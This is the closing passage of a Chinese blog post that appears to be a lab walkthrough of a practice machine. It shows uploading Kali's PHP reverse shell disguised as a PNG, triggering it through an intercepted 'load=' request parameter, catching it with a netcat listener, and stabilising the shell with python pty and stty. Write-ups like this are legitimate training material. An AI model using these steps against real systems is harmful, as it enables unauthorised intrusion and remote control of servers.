<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123857.png" alt="image-20231025012317474"></p>
<p><em><strong>成功获得root权限！</strong></em></p>
<h1 id="补充1：建立反弹shell的另一种方式"><a href="#补充1：建立反弹shell的另一种方式" class="headerlink" title="补充1：建立反弹shell的另一种方式"></a>补充1：建立反弹shell的另一种方式</h1><p>还有一种方式是使用直接建立反弹shell的php文件</p>
<p>使用Kali Linux的<code>/usr/share/webshells/php/php-reverse-shell.php</code>文件，修改文件中的目标ip为kali的ip，重复文件上传方法(这里将文件名修改为了in.png)，上传到靶机上</p>
<p>在kali上监听1234端口 <code>nc -nvlp 1234</code></p>
<p>拦截Show Users请求，将load行修改为：</p>
<p><code>load=uploaded_images/in.png&amp;continue=continue</code></p>
<p>发送请求后，成功建立反弹shell</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123992.png" alt="image-20231025012332625"></p>
<h1 id="补充2：美化reverse-shell"><a href="#补充2：美化reverse-shell" class="headerlink" title="补充2：美化reverse shell"></a>补充2：美化reverse shell</h1><p>如果靶机上有python，可以在建立反弹shell后输入<code>python -c &quot;import pty; pty.spawn(&#39;/bin/bash&#39;)&quot;</code>命令，美化shell。如果有命令终端回显，可以使用<code>stty raw -echo</code>进制回显。</p>
<p>美化前：</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123974.png" alt="image-20231025012342590"></p>
<p>美化后：</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123725.png" alt="image-20231025012354359"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%94%BB%E9%98%B2/" rel="tag"># 攻防</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/11/30/python%20socket%E7%BC%96%E7%A8%8B%E4%B9%8B---TCP%E9%80%9A%E4%BF%A1/" rel="prev" title="python socket编程之---TCP通信">
                  <i class="fa fa-angle-left"></i> python socket编程之---TCP通信
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/02/21/Docker%E5%85%A5%E9%97%A8%E4%B8%8EDocker%E7%BD%91%E7%BB%9C/" rel="next" title="Docker入门与Docker网络">
                  Docker入门与Docker网络 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Jason Li</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">13k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">45 分钟</span>
  </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
